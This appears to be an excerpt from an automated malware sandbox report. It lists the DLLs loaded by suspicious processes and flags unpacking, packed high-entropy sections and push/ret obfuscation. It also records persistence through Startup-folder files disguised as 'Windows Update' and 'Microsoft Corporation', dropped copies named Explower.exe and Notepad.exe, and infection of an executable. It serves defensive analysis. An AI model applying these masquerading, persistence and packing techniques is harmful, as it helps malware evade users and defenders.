Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: acgenral.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msacm32.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winmmbase.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: LisectAVT_2403002B_366.exe Static file information: File size 1214464 > 1048576
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Unpacked PE file: 1.2.RRqyIX.exe.ae0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\Temp\server.exe Unpacked PE file: 4.2.server.exe.9a0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Unpacked PE file: 15.2.RRqyIX.exe.a30000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Unpacked PE file: 21.2.Microsoft Corporation.exe.930000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;.data:EW;du:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:ER;.data:ER;du:ER;
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Unpacked PE file: 22.2.RRqyIX.exe.510000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Unpacked PE file: 0.2.LisectAVT_2403002B_366.exe.600000.0.unpack
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: du
PE file contains sections with non-standard names
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name:
Source: LisectAVT_2403002B_366.exe Static PE information: section name: du
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name:
Source: server.exe.0.dr Static PE information: section name: du
Source: RRqyIX.exe.0.dr Static PE information: section name: .aspack
Source: RRqyIX.exe.0.dr Static PE information: section name: .adata
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr Static PE information: section name: PELIB
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR
Source: SciTE.exe.1.dr Static PE information: section name: u
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name:
Source: Explower.exe.4.dr Static PE information: section name: du
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name:
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: du
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name:
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: du
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name:
Source: Explower.exe0.4.dr Static PE information: section name: du
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name:
Source: Explower.exe1.4.dr Static PE information: section name: du
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name:
Source: Explower.exe2.4.dr Static PE information: section name: du
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name:
Source: Explower.exe3.4.dr Static PE information: section name: du
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name:
Source: Explower.exe4.4.dr Static PE information: section name: du
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name:
Source: Explower.exe5.4.dr Static PE information: section name: du
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name:
Source: Explower.exe6.4.dr Static PE information: section name: du
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name:
Source: Explower.exe7.4.dr Static PE information: section name: du
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name:
Source: Explower.exe8.4.dr Static PE information: section name: du
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name:
Source: system.exe.4.dr Static PE information: section name: du
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name:
Source: Notepad.exe.4.dr Static PE information: section name: du
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006382D8 push ecx; mov dword ptr [esp], eax 0_2_006382D9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062447A push 006244A8h; ret 0_2_006244A0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006244EC push 00624518h; ret 0_2_00624510
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006244B4 push 006244E0h; ret 0_2_006244D8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00624524 push 00624550h; ret 0_2_00624548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0063853C push ecx; mov dword ptr [esp], edx 0_2_00638541
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062C5A8 push 0062C754h; ret 0_2_0062C74C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00624588 push 006245BCh; ret 0_2_006245B4
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00622630 push 00622681h; ret 0_2_00622679
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00638764 push ecx; mov dword ptr [esp], edx 0_2_00638769
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062C756 push 0062C7C7h; ret 0_2_0062C7BF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006357D8 push 00635838h; ret 0_2_00635830
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006228EA push 00622918h; ret 0_2_00622910
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006388C4 push ecx; mov dword ptr [esp], edx 0_2_006388C9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062C8DA push 0062C908h; ret 0_2_0062C900
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00638880 push ecx; mov dword ptr [esp], edx 0_2_00638885
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0063688C push 006368D9h; ret 0_2_006368D1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0063496E push 006349EDh; ret 0_2_006349E5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006339C0 push 00633A36h; ret 0_2_00633A2E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_006229A8 push 006229D4h; ret 0_2_006229CC
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00633A38 push 00633AE0h; ret 0_2_00633AD8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00633AE2 push 00633B30h; ret 0_2_00633B28
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623AC8 push ecx; mov dword ptr [esp], eax 0_2_00623AC9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00635ABC push ecx; mov dword ptr [esp], ecx 0_2_00635ABF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00634C3C push 00634C68h; ret 0_2_00634C60
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623D72 push 00623DA0h; ret 0_2_00623D98
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00635D2C push ecx; mov dword ptr [esp], ecx 0_2_00635D2E
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0062BDDC push ecx; mov dword ptr [esp], edx 0_2_0062BDE1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623DAC push 00623DD8h; ret 0_2_00623DD0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_00623ED4 push 00623F00h; ret 0_2_00623EF8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Code function: 0_2_0061EFD8 push eax; ret 0_2_0061F014
Source: LisectAVT_2403002B_366.exe Static PE information: section name: entropy: 7.976487863015766
Source: LisectAVT_2403002B_366.exe Static PE information: section name: .data entropy: 7.970274705878334
Source: LisectAVT_2403002B_366.exe Static PE information: section name: du entropy: 6.934584666735054
Source: server.exe.0.dr Static PE information: section name: entropy: 7.976487863015766
Source: server.exe.0.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: server.exe.0.dr Static PE information: section name: du entropy: 6.934584666735054
Source: RRqyIX.exe.0.dr Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr Static PE information: section name: EpNuZ entropy: 6.934446577355295
Source: MyProg.exe.1.dr Static PE information: section name: Y|uR entropy: 6.934784069858757
Source: SciTE.exe.1.dr Static PE information: section name: u entropy: 6.933741776560137
Source: Explower.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Microsoft Corporation.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe0.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe0.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe0.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe1.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe1.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe1.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe2.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe2.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe2.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe3.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe3.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe3.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe4.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe4.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe4.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe5.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe5.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe5.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe6.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe6.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe6.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe7.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe7.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe7.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Explower.exe8.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Explower.exe8.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Explower.exe8.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: system.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: system.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: system.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054
Source: Notepad.exe.4.dr Static PE information: section name: entropy: 7.976487863015766
Source: Notepad.exe.4.dr Static PE information: section name: .data entropy: 7.970274705878334
Source: Notepad.exe.4.dr Static PE information: section name: du entropy: 6.934584666735054

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\AppData\Local\Temp\server.exe File created: C:\Users\user\Documents\Explower.exe Jump to dropped file
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
